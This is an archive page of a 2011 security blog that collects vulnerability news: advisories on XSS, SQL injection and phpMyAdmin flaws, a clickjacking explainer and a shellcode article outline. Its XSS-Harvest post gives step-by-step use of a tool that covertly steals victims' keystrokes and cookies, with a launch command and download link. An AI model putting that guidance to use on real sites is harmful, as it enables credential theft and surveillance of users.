... neuere Einträge
Wednesday, 13. July 2011
Mitigating Software Vulnerabilities
Am Wednesday, 13. Jul 2011 im Topic 'Vulnerabilities'
How exploit mitigation technologies can help reduce or eliminate risk, prevent attacks and minimize operational disruption due to software vulnerabilities
Download PDF
http://www.microsoft.com/downloads/info.aspx?na=41&srcfamilyid=3fec5647-f58b-4443-9ead-eb219f4bf31d&srcdisplaylang=en&u=http%3a%2f%2fdownload.microsoft.com%2fdownload%2f5%2f0%2f5%2f505646ED-5EDF-4E23-8E84-6119E4BF82E0%2fMitigating_Software_Vulnerabilities.pdf
Download PDF
http://www.microsoft.com/downloads/info.aspx?na=41&srcfamilyid=3fec5647-f58b-4443-9ead-eb219f4bf31d&srcdisplaylang=en&u=http%3a%2f%2fdownload.microsoft.com%2fdownload%2f5%2f0%2f5%2f505646ED-5EDF-4E23-8E84-6119E4BF82E0%2fMitigating_Software_Vulnerabilities.pdf
Windows x64 Shellcode
Am Wednesday, 13. Jul 2011 im Topic 'Vulnerabilities'
Contents
Introduction
RIP-Relative Addressing
API Lookup Overview
API Lookup Demo
The Code
Building
Testing
Comments
Mitigations
Source:
http://mcdermottcybersecurity.com/articles/windows-x64-shellcode
Introduction
RIP-Relative Addressing
API Lookup Overview
API Lookup Demo
The Code
Building
Testing
Comments
Mitigations
Source:
http://mcdermottcybersecurity.com/articles/windows-x64-shellcode
Monday, 11. July 2011
WebCalendar - XSS
Am Monday, 11. Jul 2011 im Topic 'Vulnerabilities'
Affected Software: Version 1.2.3 and probably prior versions
Vendor URL: http://www.k5n.us/webcalendar.php
Details
http://www.rul3z.de/advisories/SSCHADV2011-008.txt
by schurtz
Vendor URL: http://www.k5n.us/webcalendar.php
Details
http://www.rul3z.de/advisories/SSCHADV2011-008.txt
by schurtz
Clickjacking Attacks Unresolved
Am Monday, 11. Jul 2011 im Topic 'Vulnerabilities'
Share with your friends on Facebook Share with your friends on StumbleUpon Share with your friends on Digg Reddit this post Share with your friends on del.icio.us Technorati
Clickjacking attacks were originally described by Robert Hansen and Jeremiah Grossman in 2008. In these attacks, the attacker tricks the user into interacting with a malicious web page, but routes the user’s input to another web page that would result in undesirable consequences. A commonly used technique is to embed the targeted web page with a completely transparent IFRAME and lure the user to click on it unintentionally. There are plenty of known variants demonstrated by researchers, with or without JavaScript.
read full article
https://docs.google.com/document/pub?id=1hVcxPeCidZrM5acFH9ZoTYzg1D0VjkG3BDW_oUdn5qc
Clickjacking attacks were originally described by Robert Hansen and Jeremiah Grossman in 2008. In these attacks, the attacker tricks the user into interacting with a malicious web page, but routes the user’s input to another web page that would result in undesirable consequences. A commonly used technique is to embed the targeted web page with a completely transparent IFRAME and lure the user to click on it unintentionally. There are plenty of known variants demonstrated by researchers, with or without JavaScript.
read full article
https://docs.google.com/document/pub?id=1hVcxPeCidZrM5acFH9ZoTYzg1D0VjkG3BDW_oUdn5qc
Sunday, 10. July 2011
BBC XSS Vulnerability
Am Sunday, 10. Jul 2011 im Topic 'Vulnerabilities'
by Nerv
Saturday, 9. July 2011
Facebook Sql Injection
Am Saturday, 9. Jul 2011 im Topic 'Vulnerabilities'
by Nerv
Burger King - Xss Attack
Am Saturday, 9. Jul 2011 im Topic 'Vulnerabilities'
By: Nerv
Thursday, 7. July 2011
Harvesting Cross Site Scripting (XSS) Victims - Clicks, Keystrokes and Cookies - Linux
Am Thursday, 7. Jul 2011 im Topic 'Vulnerabilities'
XSS-Harvest.
It is multi-threaded pre-forking web server written in Perl, and requires no dependencies other than a couple of common Perl modules; you do not need a web server or database to use this tool. Before going into the detail, I'll list the high level functionality below:
Infection script adds relevant event listeners (keystrokes, onload() and mouse clicks) to the vulnerable page and sets up communication with the XSS-Harvest server.
Any key entered will be sent covertly to the server.
Any mouse click performed will be analysed and the data covertly sent to the server.
Optionally 'redress' the vulnerable page to display a different page on the same subdomain - e.g. a login form.
If redressing the victim's browser, allow subsequently loaded pages to be also 'infected' - assuming they don't break the same-origin policy (i.e. they're on the same subdomain).
Keeps track of victims for the lifetime of the XSS-Harvest cookie (future visits are recognised as a returning victim).
Each victim has a separate history file containing all events, cookies and keystrokes.
Server console displays real time data received (due to multi-threaded nature, keystrokes are displayed as '.' characters to avoid confusion).
Tested in IE6-9 (reflected XSS protection in IE9 will limit exploitation to stored XSS only in most cases), FF5, Chrome and various mobile browsers (Safari and Android). Please let me know your success with other browsers.
Overcomes browser oddities, such as Internet Explorer throttling requests to the same URL when exfiltrating keystrokes.
How to Exploit XSS with XSS-Harvest
Identify a page vulnerable to XSS (reflected or persistent will be fine - unless the victim is running IE9 or another plugin such as NoScript).
Understand the markup of the page. You should be looking to insert syntactically correct tags in to the source of the vulnerable page. Most attackers will insert something like 'alert(1)' at this stage to ensure the page is actually vulnerable.
Start the XSS-Harvest server as root if you wish to bind to a TCP port < 1024 (default port is 80), or as a limited user on a port > 1024 using the -p option. To start the server you must instruct it to listen with the -l option.
Insert the following 'injection string' into the vulnerable page:
This will return the client-side JavaScript to the victim, indicated by the 'i' in the URL.
Entice visitors to the infected page (or to follow a link in the case of reflected XSS).
Watch your victims roll in - a new history file will be created for each new victim.
If you wish to make use of the redress function, start the server with the -r parameter:
./xss-harvest.pl -l -r http://vulnerablepage.local/login.html
Download:
https://docs.google.com/leaf?id=0B-yhjV3y1-D2ZmVlMmUxMWUtNjJhYy00Njc5LWI0M2ItZTMwMmIxMTQ0NTNh&hl=en_GB
It is multi-threaded pre-forking web server written in Perl, and requires no dependencies other than a couple of common Perl modules; you do not need a web server or database to use this tool. Before going into the detail, I'll list the high level functionality below:
Infection script adds relevant event listeners (keystrokes, onload() and mouse clicks) to the vulnerable page and sets up communication with the XSS-Harvest server.
Any key entered will be sent covertly to the server.
Any mouse click performed will be analysed and the data covertly sent to the server.
Optionally 'redress' the vulnerable page to display a different page on the same subdomain - e.g. a login form.
If redressing the victim's browser, allow subsequently loaded pages to be also 'infected' - assuming they don't break the same-origin policy (i.e. they're on the same subdomain).
Keeps track of victims for the lifetime of the XSS-Harvest cookie (future visits are recognised as a returning victim).
Each victim has a separate history file containing all events, cookies and keystrokes.
Server console displays real time data received (due to multi-threaded nature, keystrokes are displayed as '.' characters to avoid confusion).
Tested in IE6-9 (reflected XSS protection in IE9 will limit exploitation to stored XSS only in most cases), FF5, Chrome and various mobile browsers (Safari and Android). Please let me know your success with other browsers.
Overcomes browser oddities, such as Internet Explorer throttling requests to the same URL when exfiltrating keystrokes.
How to Exploit XSS with XSS-Harvest
Identify a page vulnerable to XSS (reflected or persistent will be fine - unless the victim is running IE9 or another plugin such as NoScript).
Understand the markup of the page. You should be looking to insert syntactically correct tags in to the source of the vulnerable page. Most attackers will insert something like 'alert(1)' at this stage to ensure the page is actually vulnerable.
Start the XSS-Harvest server as root if you wish to bind to a TCP port < 1024 (default port is 80), or as a limited user on a port > 1024 using the -p option. To start the server you must instruct it to listen with the -l option.
Insert the following 'injection string' into the vulnerable page:
This will return the client-side JavaScript to the victim, indicated by the 'i' in the URL.
Entice visitors to the infected page (or to follow a link in the case of reflected XSS).
Watch your victims roll in - a new history file will be created for each new victim.
If you wish to make use of the redress function, start the server with the -r parameter:
./xss-harvest.pl -l -r http://vulnerablepage.local/login.html
Download:
https://docs.google.com/leaf?id=0B-yhjV3y1-D2ZmVlMmUxMWUtNjJhYy00Njc5LWI0M2ItZTMwMmIxMTQ0NTNh&hl=en_GB
Wednesday, 6. July 2011
Dukascopy.com - SQL Injection
Am Wednesday, 6. Jul 2011 im Topic 'Vulnerabilities'
General Information
Website: www.dukascopy.com
Vulnerability Type: SQL Injection Vulnerability
Alert Level: Critical
Threats: Entire Database Access, Shell Uploading
by Mr.
zsecure
Website: www.dukascopy.com
Vulnerability Type: SQL Injection Vulnerability
Alert Level: Critical
Threats: Entire Database Access, Shell Uploading
by Mr.
zsecure
phpMyAdmin Multiple Vulnerabilities
Am Wednesday, 6. Jul 2011 im Topic 'Vulnerabilities'
Software:
phpMyAdmin 3.x
1) An error within the "Swekey_login()" function in libraries/auth/swekey/swekey.auth.lib.php can be exploited to overwrite session variables and e.g. inject and execute arbitrary PHP code.
2) Input passed to the "PMA_createTargetTables()" function in libraries/server_synchronize.lib.php is not properly sanitised before calling the "preg_replace()" function with the "e" modifier. This can be exploited to execute arbitrary PHP code via URL-encoded NULL bytes.
3) Input passed to the "PMA_displayTableBody()" function in libraries/display_tbl.lib.php is not properly sanitised before being used to include files. This can be exploited to include arbitrary files from local resources via directory traversal sequences.
NOTE: A weakness in setup scripts, which could lead to arbitrary PHP code injection if session variables are overwritten.
The vulnerabilities in versions prior to 3.3.10.2 and 3.4.3.1.
phpMyAdmin 3.x
1) An error within the "Swekey_login()" function in libraries/auth/swekey/swekey.auth.lib.php can be exploited to overwrite session variables and e.g. inject and execute arbitrary PHP code.
2) Input passed to the "PMA_createTargetTables()" function in libraries/server_synchronize.lib.php is not properly sanitised before calling the "preg_replace()" function with the "e" modifier. This can be exploited to execute arbitrary PHP code via URL-encoded NULL bytes.
3) Input passed to the "PMA_displayTableBody()" function in libraries/display_tbl.lib.php is not properly sanitised before being used to include files. This can be exploited to include arbitrary files from local resources via directory traversal sequences.
NOTE: A weakness in setup scripts, which could lead to arbitrary PHP code injection if session variables are overwritten.
The vulnerabilities in versions prior to 3.3.10.2 and 3.4.3.1.
... ältere Einträge
